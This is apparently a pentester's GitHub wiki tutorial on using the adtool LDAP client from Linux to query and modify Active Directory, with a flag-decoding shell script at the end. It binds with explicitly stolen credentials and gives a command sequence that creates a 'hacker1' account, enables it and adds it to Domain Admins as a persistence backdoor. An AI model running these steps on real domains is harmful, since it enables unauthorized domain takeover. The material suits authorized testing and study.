Linux LDAP Tricks ADTOOL - evilmog/evilmog GitHub Wiki
We've all had to do it at one point: we've had to do Active Directory work from Linux, such as Ubuntu with PTF, or Kali. We could write a tool in Python or Ruby, or do something evil in Perl, but sometimes we need a good old-fashioned LDAP client that just works from the command line.
So I was running my mouth off on Twitter yesterday after I saw a post about @mubix running a password reset on Windows from the Linux CLI. I bragged about how I'd done this for years, and then, after I was called out on it, I realized I hadn't done a blog post. As they say in the industry, PoC or GTFO. This is my writeup.
To start off with, we have a number of options, but for this I am going to use adtool, which is easy to install. There are a couple of requirements on the AD side: first, the target domain must have LDAPS enabled in order for password resets to work (AD only accepts a write to the password attribute over an encrypted connection), and second, you must have the public cert of the CA that signed the Domain Controller cert, or be willing to ignore cert validation. Ignoring cert validation is bad, but do as I say and not as I do. Also, standard disclaimer: do not write an IDM in bash. I've done it, it's evil, and it's likely a security nightmare if somebody injects raw code into it.
To install, run the following:
tar zxvf adtools-1.x.tar.gz
cd adtools-1.x
./configure
make
make install
Now we will need some information to connect: an LDAP user to bind as and their bind DN, the URI of the Active Directory server to connect to, that LDAP user's AD password, and the LDAP search base.
For example, if we are connecting to ad1.contoso.com, our LDAP URI would be ldaps://ad1.contoso.com:636; if we were going over plain LDAP we could use ldap://ad1.contoso.com, and in theory we could also connect read-only to a Global Catalog server on the appropriate port.
For the user account this is where things get fun: in some domains the Distinguished Name (DN) may not match the sAMAccountName. A script to find the DN for the current user in Windows can be found here, but basically the format looks like this: cn=evilmog,ou=Users,dc=contoso,dc=com
The bind password is self-explanatory: it is the Active Directory password of your bind user.
The search base is where in the tree you are looking. I usually start at the domain root; this isn't optimal for speed, but it is handy as a pentester. If I'm cn=evilmog,ou=Users,dc=contoso,dc=com then my search base is dc=contoso,dc=com; if I have a domain like subdomain.contoso.com my search base would be dc=subdomain,dc=contoso,dc=com (of course I'd need to edit the LDAP URI etc.; everything should match up).
All of these can be passed on the command line to adtool, like this:
adtool -H 'ldaps://ad1.contoso.com:636' -D 'cn=evilmog,ou=Users,dc=contoso,dc=com' -w 'mystolenpassword123!' -b 'dc=contoso,dc=com'
If you are doing this often it gets annoying, so make a ~/.adtool.cfg with the following contents, changing the values to your own of course:
uri ldaps://ad1.contoso.com:636
binddn cn=evilmog,ou=Users,dc=contoso,dc=com
bindpw mystolenpassword123!
searchbase dc=contoso,dc=com
So now that this is all set up, what do you do with it? Well, almost anything really; it's just best if you know a bit about LDAP, as this is a fairly dumb client, but it works. It's also a great testing tool if you are making your own LDAP tools.
Say we want to make a new domain administrator user (this should totally tip off the SOC or cause a SIEM alert):
adtool usercreate hacker1 ou=Users,dc=contoso,dc=com
adtool setpass hacker1 Somecompliantpassword123!
adtool userunlock hacker1 (I think this calls a replace of useraccountcontrol)
adtool attributereplace hacker1 useraccountcontrol 512
adtool groupadduser "Domain Admins" hacker1
If you are looking to do some enumeration, like finding out the group memberships of a user, run this (note you will need to use the first component of the DN, i.e. the value before the first comma; it sometimes works on the sAMAccountName though):
adtool attributeget hacker1 memberof
To find out memberships of a group
adtool attributeget "Domain Admins" member
To disable a user
adtool attributereplace hacker1 useraccountcontrol 514
To reset account lockout
adtool attributereplace hacker1 lockouttime 0
To find a user's DN
adtool search samaccountname hacker1
A handy guide to useraccountcontrol attributes is here. Basically, useraccountcontrol is a bitmask of various flags, and it's handy to decode the attribute. A quick one-liner to print it in binary is
echo "obase=2;$useraccountcontrol" | bc
In this case we could use 512 or 514: 512 is a normal user account, and 514 is the same account with the disabled bit (2) set. If you get good with bash you can pull out specific flags.
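A fuller decoder for that attribute, as an added example that is not part of this wiki or of the adtool project: it maps every set bit of a useraccountcontrol value to its documented flag name (the whole flag set, not just the 512 and 514 above) and separately lists the flags worth reviewing in an audit. The value is passed as an argument; feeding it from adtool attributeget is an assumption left in a comment.

```shell
#!/bin/sh
# Decode an Active Directory userAccountControl bitmask into named flags.
# Bit values are the documented userAccountControl flags (ADS_USER_FLAG_ENUM).

UAC_FLAGS="SCRIPT:1 ACCOUNTDISABLE:2 HOMEDIR_REQUIRED:8 LOCKOUT:16
PASSWD_NOTREQD:32 PASSWD_CANT_CHANGE:64 ENCRYPTED_TEXT_PWD_ALLOWED:128
TEMP_DUPLICATE_ACCOUNT:256 NORMAL_ACCOUNT:512 INTERDOMAIN_TRUST_ACCOUNT:2048
WORKSTATION_TRUST_ACCOUNT:4096 SERVER_TRUST_ACCOUNT:8192
DONT_EXPIRE_PASSWORD:65536 MNS_LOGON_ACCOUNT:131072 SMARTCARD_REQUIRED:262144
TRUSTED_FOR_DELEGATION:524288 NOT_DELEGATED:1048576 USE_DES_KEY_ONLY:2097152
DONT_REQ_PREAUTH:4194304 PASSWORD_EXPIRED:8388608
TRUSTED_TO_AUTH_FOR_DELEGATION:16777216 PARTIAL_SECRETS_ACCOUNT:67108864"

# Flags that weaken an account's authentication posture; worth a look in any audit.
UAC_REVIEW="PASSWD_NOTREQD ENCRYPTED_TEXT_PWD_ALLOWED DONT_EXPIRE_PASSWORD TRUSTED_FOR_DELEGATION USE_DES_KEY_ONLY DONT_REQ_PREAUTH TRUSTED_TO_AUTH_FOR_DELEGATION"

# uac_decode VALUE -> space-separated names of the bits set in VALUE
uac_decode() {
    uac=$1
    out=""
    for pair in $UAC_FLAGS; do
        name=${pair%%:*}
        bit=${pair##*:}
        if [ $(( uac & bit )) -ne 0 ]; then
            out="${out:+$out }$name"
        fi
    done
    printf '%s\n' "$out"
}

# uac_review VALUE -> only those set flags that appear in UAC_REVIEW
uac_review() {
    out=""
    for name in $(uac_decode "$1"); do
        case " $UAC_REVIEW " in
            *" $name "*) out="${out:+$out }$name" ;;
        esac
    done
    printf '%s\n' "$out"
}

# Example from the text: 514 is NORMAL_ACCOUNT (512) with ACCOUNTDISABLE (2) set.
uac_decode 514
# To decode a live account (assumption: adtool prints the bare attribute value):
#   uac_decode "$(adtool attributeget hacker1 useraccountcontrol)"
```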
Google is your friend: some attributes in AD are read-only, not all search filters work, and you may need to get evil, but this tool will get the job done.